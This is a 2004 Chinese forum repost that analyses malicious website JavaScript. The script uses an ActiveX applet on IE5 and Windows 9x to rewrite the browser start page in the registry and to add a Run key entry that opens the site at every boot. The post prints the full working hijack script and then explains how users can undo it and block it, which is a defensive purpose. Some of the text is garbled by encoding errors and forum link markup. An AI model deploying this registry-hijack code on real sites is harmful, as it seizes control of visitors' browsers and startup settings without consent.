[转帖]解剖恶意网站代码：弹出IE页面(页 1) - 电脑数码 - 河源学生社区河源学生网（Hyxs.Net）——河源地区最大的青少年网络交流平台！

Anasn 发表于 2004-5-20 22:21

[转帖]解剖恶意网站代码：弹出IE页面

来源：<A href="http://gebitu.vicp.net/bbs/topic.asp?l_id=35&t_id=540" target="_blank" >http://gebitu.vicp.net/bbs/topic.asp?l_id=35&t_id=540</A>



许多网友纷纷指出有的网站不择手段，当用户访问过它们的网页后，不仅IE默认首页被篡改了，而且每次开机后IE都会自动弹出访问该网站。

 ?牐犖仪通过对下面这段JavaScript程序的解剖，希望读者能明白其究竟，并掌握修复的方法。网站应该用丰富精彩的栏目来吸引访问者，希望通过对用户注册表的恶意篡改来达到提高访问量的目的不仅会事得其反，更是一种不道德的行为。

 ?牐牨敬?码由子昂轩编辑制作，仅供学习研究之用。

 ?牐? 

<SCRIPT language=javascript>

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f(){

try

{

//ActiveX初始化过程(为达到修改用户注册表所必须的准备程序)

a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Shl = a1.GetObject();

a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");

a1.createInstance();

FSO = a1.GetObject();

a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Net = a1.GetObject();

try

{

if (documents.cookie.indexOf("Chg") == -1)

//以下是检测用户注册表并修改相应的键值

{

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "<IMG src="http://gebitu.vicp.net/bbs/image/url.gif" align=absMiddle border=0><A href='http://javahouse.126.com/"' target="_blank" >http://JavaHouse.126.com/"</A>;);//修改用户InternetExplorer浏览器的默认主页

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "<IMG src="http://gebitu.vicp.net/bbs/image/url.gif" align=absMiddle border=0><A href='http://javahouse.126.com/"' target="_blank" >http://JavaHouse.126.com/"</A>;);//建立默认启动页面程序，保证用户每次启动计算机首先打开该页面

var expdate = new Date((new Date()).getTime() + (1));

documents.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"

}

}

catch(e)

{}

}

catch(e)

{}

}

function init()

{

setTimeout("f()", 1000);//实现打开页面后1秒钟内执行测试修改注册表的工作

}

init();</SCRIPT>



首先，我们来分析一下这句代码，程序中使用：

 ?牐? Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "<IMG src="http://gebitu.vicp.net/bbs/image/url.gif" align=absMiddle border=0><A href='http://javahouse.126.com/"' target="_blank" >http://JavaHouse.126.com/"</A>;);//修改用户InternetExplorer浏览器的默认主页

 ?牐犉涫稻褪切薷挠没ё⒉岜碇?

 ?牐? HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\main\文件夹下Start Page的键值，

 ?牐犝饫锩娴闹稻褪谴娣诺腎E浏览器的默认主页，如果你想改回来，把上面的相应代码改为：

 ?牐? Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "about:blank");

 ?牐牼涂梢允迪执蚩狪E是空白页了；当然你也不用动注册表，直接打开IE修改Internet选项中的主页更方便些。

 ?牐犜倮纯纯瓷鲜龀绦蜃畋氨傻囊痪浯?码：

 ?牐? Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "<IMG src="http://gebitu.vicp.net/bbs/image/url.gif" align=absMiddle border=0><A href='http://javahouse.126.com/"' target="_blank" >http://JavaHouse.126.com/"</A>;);//建立默认启动页面程序，保证用户每次启动计算机首先打开该页面

 ?牐犕ü?在注册表中

 ?牐? HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

 ?牐犖募?夹下建立Windows默认启动程序，当Windows启动后，我们会发现这个网页会自动打开，但是在“开始”－“程序”－“启动”中却找不到，这是为什么呢？哦，原来都放到Run这个文件夹下面了。怎么来修改呢？两种方法，一是查找源头，进入注册表，删除Run下面的相应项就可以了；二是在“开始”－“运行”处输入"msconfig"，把启动下面相应的那个网站前面的"√"去掉，重新启动计算机就可以了。

 ?牐牨苊獯死喽褚庑薷淖⒉岜淼脑俅畏⑸?，你可以在IE的安全属性设置中禁掉ActiveX，当然在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。还有一种办法就是对于Windows98打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP，把ActiveXComponent.class删掉;对于WindowsMe打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP，把ActiveXComponent.class删掉。放心，删除这个组件不会影响你正常浏览网页的。

 ?牐犠詈笏邓翟谑滓呈褂谜饫啻?码的网站的目的，像在启动计算机直接打开网页的做法我认为主要是针对宽带和专线上网的用户，这样只要你不修改注册表禁掉它，你的IE主页每次进入系统都会自动被修改成那个网站；对于拨号上网的用户每次进入系统都开一个找不到的主页，也无所谓，至少你不改注册表，直接修改IE主页属性后可以避免被那种网站再次修改（前提是不再进那个网站），可是每次开机后都弹出个网页也真是让人讨厌。

 ?牐犚陨洗?码适用于Windows9x/Me，InternetExplorer5.X浏览器，据说对IE6.0无效（因为它里面没有ActiveXComponent.class这个组件），但作者没有测试过。

页: [1]

河源学生社区's Archiver

[转帖]解剖恶意网站代码：弹出IE页面